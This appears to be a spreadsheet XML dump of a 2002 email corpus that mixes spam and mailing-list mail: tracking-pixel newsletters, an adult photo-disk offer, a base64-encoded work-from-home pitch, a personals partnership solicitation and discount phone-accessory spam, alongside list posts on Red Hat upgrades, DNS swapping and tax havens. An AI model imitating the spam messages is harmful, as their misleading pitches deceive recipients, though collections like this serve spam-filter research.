 &lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTpl-sN_pbnY9y52GfwH4R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBmqH02K74p01K7fy3rR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQBZe6FrAP_kMFIM55iR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1reIyr_O_Iti64Q9t8PR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrd8cbl-pEvKY-qkCKnR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=27-z9PmnOI34RnMMcu2DC9pyE4-j9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Inside the biker world
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;FONT size=3D2&gt; kjhkjh    hghg   jhgjhjgvjh&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 We sent our photographer into the biker parties. He got pictures of the bi=
 kes &amp; lifestyle but&lt;BR&gt;
 &lt;BR&gt;
 mostly he got pictures of the biker girls. Some sexy &amp; a lot nude.&lt;BR&gt;
 &lt;BR&gt;
 We burned these pictures to a disk and now they available on disk for you =
 to view on your own &lt;BR&gt;
 &lt;BR&gt;
 computer. The parties are wild and so are the pictures. Over 190 pictures =
 on the disk and the &lt;BR&gt;
 &lt;BR&gt;
 29.99 price also includes express shipping !!!! &lt;BR&gt;
 &lt;BR&gt;
 These pictures are uncensored so do not request any more information if yo=
 u are not at least 18.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 For a order type "order form" in the subject and  reply to:&lt;BR&gt;
 &lt;BR&gt;
 BikeDisk@excite.com&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 To be removed from our mailing type "nobikers" in the subject and reply to=
  :&lt;BR&gt;
 &lt;BR&gt;
 NoBikesToday@excite.com&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;p&gt;&lt;FONT size=3D2&gt; kjhkjh    hghg   jhgjhjgvjh&lt;BR&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 1Mb/s through mud
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531633
 Date: Not supplied
 The DoE has announced a high-speed data-transfer that runs on drillpipe, 
 through "a 4-inch diameter steel pipe immersed in electrically conductive mud 
 at pressures up to 1000 atmospheres, temperatures up to 150 deg C, and with 
 vibrational accelerations of hundreds of g's:" 
     Now, with a high-speed, bi-directional communications link, a drilling 
     system's azimuth, inclination, pressure, temperature, loads and vibration, 
     along with information on rock characteristics near the drill bit, can be 
     evaluated almost instantly. Also, because of the ability to send high-speed 
     data through the drill pipe, technologies once thought unobtainable  such 
     as collecting seismic data at the drill bit  may now be possible. 
     With high-resolution seismic data collected "ahead of the bit," operators 
     could steer the drill bit more precisely toward oil- and gas-bearing sweet 
     spots and away from less productive areas. This will enhance the efficiency 
     of oil and gas wells and reduce the number of wells needed to produce a 
     reservoir.  
 Link[1] Discuss[2] (_via /.[3]_)
 [1] http://www.fossil.energy.gov/techline/tl_intellipipe.shtml
 [2] http://www.quicktopic.com/boing/H/VRj5gZXZSGT
 [3] http://slashdot.org
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Matthias Saou (matthias@egwn.net) wrote*:
 &gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas
 &gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc
 &gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
 &gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-)
 &gt; 
 &gt; I think this is probably the best way, because I think (maybe) with upgrading you
 &gt; do not always automatically get the latest feature enabled in some config file
 &gt; because RH would rather take it easy and not update that config file (you get a
 &gt; rpmnew instead of rpmsaved file) so they get less calls to support that way.
 If you dislike Red Hat, why use it ? This was a really bad argument 
 against using Red Hat that makes no sense at all.  I for one am GLAD that 
 they 
 a) don't overwrite your config files on a whim (be GLAD they don't do some 
 sort of autodetection and changing crap)
 b) tell you on rpm upgrade what config files you should look at because 
 formats have changed.
 Red Hat is not "taking it easy" on this, it's putting control in the hands 
 of you, the maintainer of the machine.  Don't be lazy.
 &gt; Anyway, I have tons of media files in /home/* probably 5 to 10 gigs at least, my
 &gt; laptop's CDROM takes 700MB at a time (obviously) and compressing media files is
 &gt; dumb because they are already compressed. Dumb question: how to backup huge data?
 &gt; Network backup to another box? I do not have a box with a tape drive, but maybe box
 &gt; with a large HD with much free space could take the backup (oops, I do not have a
 &gt; space computer with a large HD with much free space).
 You don't need to backup /home if you are careful enough.  You did put 
 /home on a separate partition, no ? Just install rh80 and tell it to use 
 the same partition as /home and tell it to NOT format it, but keep the 
 data as is.
 If you didn't put /home on a separate partition, then you really do need 
 to make backups.  Use an nfs or smb mount from another machine to backup 
 and rsync straight to the mount, or if that's not possible, rsync over 
 ssh.  It's the best way to make backups.
 &gt; These media files are backed up - ON THE CD'S THEY CAME FROM! 
 It's the other way around - your media files are backups of the CD's they 
 came from ;)
 Good luck,
 Thomas
 -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 You know the shape my breath will take before I let it out
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">(This list is sponsored by Ironclad Networks http://www.ironclad.net.au/)
 --Apple-Mail-2-874629474
 Content-Transfer-Encoding: quoted-printable
 Content-Type: text/plain;
 	charset=ISO-8859-1;
 	format=flowed
 Bob
 We are a commercial company who host around 150 web sites on each of it=20=
 servers, we can=B4t swap with you because we need someone in a similar=20=
 position.
 Thank you
 Javier
 El Viernes, 30 agosto, 2002, a las 10:25 AM, Bob Musser escribi=F3:
 &gt; I'm using Simple DNS from JHSoft.=A0 We support only a few web sites =
 and=20
 &gt; I'd like to swap secondary services with someone in a similar &gt; =
 position.
 &gt; =A0
 &gt; We have a static IP, DSL line and a 24/7 set of web, SQL, mail and now=20=
 &gt; a DNS server.=A0 As I said, we are hosting about 10 web sites, web and=20=
 &gt; DNS traffic is almost nothing.=A0 Everything is on lightly loaded APC=20=
 &gt; battery backups so we are very seldom down.
 &gt; =A0
 &gt; I'd like to swap with someone also using Simple DNS to take advantage=20=
 &gt; of the trusted zone file transfer option.
 &gt; =A0
 &gt; =A0
 &gt; =A0
 &gt; Bob Musser
 &gt; Database Services, Inc.
 &gt; Makers of:
 &gt; =A0=A0 Process Server's Toolbox
 &gt; =A0=A0 Courier Service Toolbox
 &gt; BobM@dbsinfo.com
 &gt; www.dbsinfo.com
 &gt; 106 Longhorn Road
 &gt; Winter Park FL 32792
 &gt; (407) 679-1539
 &gt; =A0
 &gt; =A0
 &gt;
 ---
 Atentamente
 Javier Cota
 Integraci=F3n tecnol=F3gica
 52723341
 javier@linkcreations.com.mx
 --Apple-Mail-2-874629474
 Content-Transfer-Encoding: quoted-printable
 Content-Type: text/enriched;
 	charset=ISO-8859-1
 Bob
 We are a commercial company who host around 150 web sites on each of
 it servers, we can=B4t swap with you because we need someone in a
 similar position.
 Thank you
 Javier=20
 El Viernes, 30 agosto, 2002, a las 10:25 AM, Bob Musser escribi=F3:
 &lt;excerpt&gt;&lt;smaller&gt;I'm using Simple DNS from JHSoft.=A0 We support only a
 few web sites and I'd like to swap secondary services with someone in
 a similar position.&lt;/smaller&gt;
 =A0
 &lt;smaller&gt;We have a static IP, DSL line and a 24/7 set of web, SQL,
 mail and now a DNS server.=A0 As I said, we are hosting about 10 web
 sites, web and DNS traffic is almost nothing.=A0 Everything is on
 lightly loaded APC battery backups so we are very seldom down.&lt;/smaller&gt;
 =A0
 &lt;smaller&gt;I'd like to swap with someone also using Simple DNS to take
 advantage of the trusted zone file transfer option.&lt;/smaller&gt;
 =A0
 =A0
 =A0
 &lt;smaller&gt;Bob Musser
 Database Services, Inc.
 Makers of:
 =A0=A0 Process Server's Toolbox
 =A0=A0 Courier Service Toolbox
 &lt;underline&gt;&lt;color&gt;&lt;param&gt;1999,1999,FFFF&lt;/param&gt;BobM@dbsinfo.com
 www.dbsinfo.com
 &lt;/color&gt;&lt;/underline&gt;106 Longhorn Road
 Winter Park FL 32792
 (407) 679-1539&lt;/smaller&gt;
 =A0
 =A0
 &lt;/excerpt&gt;---
 Atentamente
 Javier Cota
 Integraci=F3n tecnol=F3gica
 52723341
 javier@linkcreations.com.mx
 --Apple-Mail-2-874629474--
 --
 To Unsubscribe: &lt;dns-swap-off@lists.ironclad.net.au&gt;
 Sponsor &amp; Host: Ironclad Networks &lt;http://www.ironclad.net.au/&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Al-Qaida suspected in tanker blast
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622117,215/
 Date: 2002-10-07T03:52:59+01:00
 French ship burns off Yemen.
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-403670396P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Mon, 19 Aug 2002 23:05:30 +0200
 &gt;
 &gt; 
 &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
 &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
 &gt; &gt; 
 &gt; &gt; I'll take the blame.
 &gt; &gt; 
 &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequences file 
 &gt; &gt; multiple times because of other sequences.  I need to make the code much 
 &gt; &gt; smarter about handling that file, but first I have a few other fish to fry in 
 &gt; &gt; my rather large patch that's on it's way.
 &gt; &gt; 
 &gt; 
 &gt; No panic,
 &gt; 
 &gt; I'm all for cleaning things up before getting it optimized.
 Okay, this fix is now checked in.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-403670396P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZPxXK9b4h5R0IUIRAvrpAJ47Bzr8fOBqRvDy70Zo+q/dBaDv+wCdGlkP
 35PlaPfCqzM6h0Y9RwT/JmQ=
 =7ghD
 -----END PGP SIGNATURE-----
 --==_Exmh_-403670396P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 BlogStart: 
 **Cypherpunks**: Tax havens and offshore islands are not quite as ''free''
 -- at least in terms of personal liberties -- as people might think.  R.
 A. Hettinga tells some stories about ''Triumph, the Fabulous
 Crotch-Sniffing Caymanian Customs Wonder Dog, ... and (the Cayman-born
 expat's kid) who was literally exiled from the island when the island
 constabulary "discovered" a marijuana seed or three in his summer-break
 rental car a few years back.''
 I guess it's back to the oil rigs then ;)
 BlogEnd: 
 LinkText: tells some stories
 ------- Forwarded Message
 Date:    Sun, 11 Aug 2002 12:31:56 -0400
 From:    "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 3:36 PM +1000 8/11/02, David Hillary wrote:
 &gt; I think that tax havens such as the Cayman Islands should be ranked
 &gt; among the freest in the world. No taxes on business or individuals
 &gt; for a start. Great environment for banking and commerce. Good
 &gt; protection of property rights. Small non-interventionist
 &gt; government.
 Clearly you've never met "Triumph", the Fabulous Crotch-Sniffing
 Caymanian Customs Wonder Dog at extreme close range, or heard the
 story about the expat's college age kid, actually born on Cayman, who
 was literally exiled from the island when the island constabulary
 "discovered" a marijuana seed or three in his summer-break rental car
 a few years back.
 I mean, his old man was some senior cheese at Global Crossing at the
 time, but this was back when they could do no wrong. If that's what
 they did to *his* kid, imagine what some poor former
 junk-bond-hustler might have to deal with someday for, say, the odd
 unauthorized Cuban nightlife excursion. A discretely folded twenty
 keeps the stamp off your passport on the ground in Havana, and a
 bottle of Maker's Mark goes a long way towards some interesting
 nocturnal diversion when you get there and all, but still, you can't
 help thinking that Uncle's going to come a-knockin', and that Cayman
 van's going to stop rockin' some day, and when it does, it ain't
 gonna be pretty.
 Closer to home, conceptually at least, a couple of cryptogeeken were
 hustled off and strip-searched, on the spot, when they landed on
 Grand Cayman for the Financial Cryptography conference there a couple
 of years ago. Like lots of cypherpunks, these guys were active
 shooters in the Bay Area, and they had stopped in Jamaica, Mon, for a
 few days on the way to Grand Cayman. Because they, and their stuff,
 reeked on both counts, they were given complementary colorectal
 examinations and an entertaining game of 20 questions, or two,
 courtesy of the Caymanian Federales, after the obligatory fun and
 games with a then-snarling Crotch-Sniffing Caymanian Wonder Dog.
 Heck, I had to completely unpack *all* my stuff for a nice, well-fed
 Caymanian customs lady just to get *out* of the country when I left.
 Besides, tax havens are being increasingly constrained as to their
 activities these days, because they cost the larger nation-states too
 much in the way of "escaped" "revenue", or at least the perception of
 same in the local "free" press. Obviously, if your money "there"
 isn't exchangeable into your money "here", it kind of defeats the
 purpose of keeping your money "there" in the first place, giving
 folks like FinCEN lots of leverage when financial treaties come up
 for renegotiation due to changes in technology, like on-line
 credit-card and securities clearing, or the odd governmental or
 quango re-org, like they are wont to do increasingly in the EU, and
 the US.
 As a result, the veil of secrecy went in Switzerland quite a while
 ago. The recent holocaust deposit thing was just the bride and groom
 on that particular wedding-cake, and, as goes Switzerland, so goes
 Luxembourg, and of course Lichtenstein, which itself is usually
 accessible only through Switzerland. Finally, of course, the Caymans
 themselves will cough up depositor lists whenever Uncle comes calling
 about one thing or another on an increasingly longer list of fishing
 pretexts.
 At this point, the "legal", state-backed pecuniary privacy pickings
 are kind of thin on the ground. I mean, I'm not sure I'd like to keep
 my money in, say, Vanuatu. Would you? Remember, this is a place where
 a bandana hanging on a string across an otherwise public road will
 close it down until the local erst-cannibal hunter-gatherer turned
 statutorily-permanent landowner figures out just what his new or
 imagined property rights are this afternoon.
 The point is, any cypherpunk worth his salt will tell you that only
 solution to financial or any other, privacy, is to make private
 transactions on the net, cheaper, and more secure, than "transparent"
 transactions currently are in meatspace. Then things get *real*
 interesting, and financial privacy -- and considerably more personal
 freedom -- will just be the icing on the wedding cake. Bride and
 groom action figures sold separately, of course.
 Cheers,
 RAH
 (Who went to FC2K at the Grand Cayman Marriott in February that year.
 Nice place, I liked Anguilla better though, at least at the time, and
 I haven't been back to either since. The beaches are certainly better
 in Anguilla, and the "private" banking system there is probably just
 as porous as Cayman's is, by this point. If I were to pick up and
 move Somewhere Free outside Your Friendly Neighborhood Unipolar
 Superpower, New Zealand is somewhere near the top of my list, and
 Chile would be next, though things change quickly out there in
 ballistic-missile flyover country. In that vein, who knows, maybe
 we're in for some kind of latter-day Peloponnesian irony, and
 *Russia* will end up the freest place on earth someday. Stranger
 things have happened in the last couple of decades, yes?)
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPVYS48PxH8jf3ohaEQKwtgCgw/XSwzauabEP/8jDvUVk/rgFdroAn0xf
 Owk90GoK+X5Pv+bGoKXCwzBK
 =1w9d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</si>
  <si>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FriendSearch and zzzzason.org Partnership
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear zzzzason.org,
 My name is Andy Koh, the Business Development Manager for FriendSearch.com.
 Could you please forward this to the person in charge of new partnerships and
 advertising.
 FriendSearch currently powers web personals and love sites for over 10,000
 partners on the web, across over 200 countries.  Some of our partners include
 AllCommunity.com, CariKawan.com, HotPlugins.com, Free-Banners.com and much
 more.  Over the months, our partners have been pleasantly surprised to find
 that we are steadily earning them significant revenue streams, month after month.
 We are looking to advertise/partner with you to provide you with:
 - 100% customizable friendsearch personals plug-in
 - steady income stream with 50% revenue share (earn up to $12.50/month/member)
 - Interactive content which will capture your audience's attention for at least 20 minutes
 - Private branding, co-branding, or your own hosted domain/site.
 - Fast, 15 minutes setup, fully automatic!
 - Zero setup fee, absolutely no charges and payments required
 To view an example of a fully customized personals using Friendsearch, go to
 http://www.carikawan.com/ which has become Malaysia's largest web personals
 and have received lots of media attention.  All it took was a few minutes to set up.
 In fact, I have taken the effort to create a partner account for you.
 Click below and you'll be taken to your control panel where you can customize
 your own Friendsearch Personals Plug-In.
 http://www.ezernet.com/b2b-domain.cgi?id=62898&amp;dname=zzzzason.org
 Please try out your account or contact me if you have further questions, or
 if you have any other ideas on how we can partner up.
 Best Regards,
 Andy Koh,
 FriendSearch.com
 Business Development Manager
 If you do not wish to have this account, click below to remove it entirely.
 http://www.ezernet.com/b2b-remove.cgi?id=62898&amp;dname=zzzzason.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CAREER OPPORTUNITY.  WORK FROM HOME
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A0_03E30A1A.B1804B54
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVscCB3YW50ZWQuICBXZSBhcmUgYSAxNCB5ZWFyIG9sZCBmb3J0dW5lIDUw
 MCBjb21wYW55LCB0aGF0IGlzDQpncm93aW5nIGF0IGEgdHJlbWVuZG91cyBy
 YXRlLiAgV2UgYXJlIGxvb2tpbmcgZm9yIGluZGl2aWR1YWxzIHdobw0Kd2Fu
 dCB0byB3b3JrIGZyb20gaG9tZS4NCg0KVGhpcyBpcyBhbiBvcHBvcnR1bml0
 eSB0byBtYWtlIGFuIGV4Y2VsbGVudCBpbmNvbWUuICBObyBleHBlcmllbmNl
 DQppcyByZXF1aXJlZC4gIFdlIHdpbGwgdHJhaW4geW91Lg0KDQpTbyBpZiB5
 b3UgYXJlIGxvb2tpbmcgdG8gYmUgZW1wbG95ZWQgZnJvbSBob21lIHdpdGgg
 YSBjYXJlZXIgdGhhdCBoYXMNCnZhc3Qgb3Bwb3J0dW5pdGllcywgdGhlbiBn
 bzoNCg0KaHR0cDovL3d3dy5iYXNldGVsLmNvbToyNzAwMC93ZWFsdGhub3cN
 Cg0KV2UgYXJlIGxvb2tpbmcgZm9yIGVuZXJnZXRpYyBhbmQgc2VsZiBtb3Rp
 dmF0ZWQgcGVvcGxlLiAgSWYgdGhhdCBpcyB5b3UNCnRoYW4gY2xpY2sgb24g
 dGhlIGxpbmsgYW5kIGZpbGwgb3V0IHRoZSBmb3JtLCBhbmQgb25lIG9mIG91
 cg0KZW1wbG95ZW1lbnQgc3BlY2lhbGlzdCB3aWxsIGNvbnRhY3QgeW91Lg0K
 DQpUbyBiZSByZW1vdmVkIGZyb20gb3VyIGxpbmsgc2ltcGxlIGdvIHRvOg0K
 DQpodHRwOi8vd3d3LmJhc2V0ZWwuY29tOjI3MDAwL3JlbW92ZS5odG1sDQoN
 Cg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Perl.  It's just a language.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000218.html
 Date: 2002-10-02T22:52:53-08:00
 I realized something the other day. I've been programming in Perl for roughly 
 seven or eight years now. Maybe nine. It's hard to remember for sure. But at 
 some point it lost its shine. It used to be a lot...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ^^^^^Cell Phone Belt Clips $1.95^^^^^^                           18070
</t>
  </si>
  <si>
    <t xml:space="preserve">Cellular Phone Accessories All At Below Wholesale Prices!
 http://202.101.163.34:81/sites/merchant/sales/
 Hands Free Ear Buds 1.99! 
 Phone Holsters 1.98! 
 Booster Antennas Only $0.99
 Phone Cases 1.98! 
 Car Chargers 1.98! 
 Face Plates As Low As 0.99! 
 Lithium Ion Batteries As Low As 6.94! 
 http://202.101.163.34:81/sites/merchant/sales/
 Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
 SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
 WHOLESALE PRICES!
 http://202.101.163.34:81/sites/merchant/sales/
 ***If You Need Assistance Please Call Us (732) 751-1457***
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 To be removed from future mailings please send your remove 
 request to: removemenow68994@btamail.net.cn 
 Thank You and have a super day :)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Canon USA Reseller News : July
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Announcement&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/hd.gif" alt="CNET Announce" width="442" height="60"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/rt.gif" width="184" height="60"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /header --&gt;
 &lt;!-- content --&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;img src="/b.gif" width="1" height="8"&gt;&lt;br&gt;&lt;div align="center"&gt;&lt;img src="http://home.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10"&gt;&lt;/div&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffffff"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 18, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Canon USA Reseller News : July&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" text="#000000" topmargin=0 leftmargin=0 marginheight="0" link="#000099" vlink="#000099"&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#ffffff"&gt;&lt;img src="http://www.captureleads.com/canon/leadblasts/nlimages/monthly_head_598.gif" width="598" height="70" alt="Canon USA Reseller News"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;tr bgcolor="#ffffff" align="right"&gt; 
     &lt;td bgcolor="#ffffff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;i&gt;July 2002 / Volume 2 No. 5&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center" &gt;
   &lt;tr&gt; 
     &lt;td width="10" valign="top" bgcolor="#d4dfff"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="180" valign="top" bgcolor="#d4dfff"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;font color="#ff0000"&gt;&lt;b&gt;&lt;font size="2"&gt;&lt;br&gt;
       The Canon USA Reseller News&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="2"&gt;provides resellers with monthly announcements&amp;nbsp;on Canon products that are purchased through national distributors.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt; &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; &lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" bgcolor="#d4dfff" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" width="10" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top" bgcolor="#e2e2e2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
       &lt;font size="2"&gt;Scan the following topics for &lt;b&gt;&lt;font color="#ff0000"&gt;"News You Can Use."&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;font size="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt; 
       &lt;/font&gt;&lt;/font&gt; 
       &lt;ul&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3"&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#here"&gt;They're Here!&lt;/A&gt;&lt;br&gt;&lt;/font&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#check"&gt;Check Out Our Q3 Promotions&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 		&lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#guess"&gt;Guess What's Coming to Distribution&lt;/A&gt;&lt;br&gt;&lt;/font&gt; 
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#training"&gt;Web-based Training Addition / We Have a Winner&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
         &lt;li type="square"&gt;&lt;font size="2"&gt;&lt;A href="#reseller"&gt;Reseller Account Executive&lt;/A&gt;&lt;br&gt;&lt;/font&gt;&lt;/li&gt;&lt;/font&gt;
 		&lt;/ul&gt;
     &lt;/td&gt;
     &lt;td width="10" valign="top" bgcolor="#e2e2e2"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
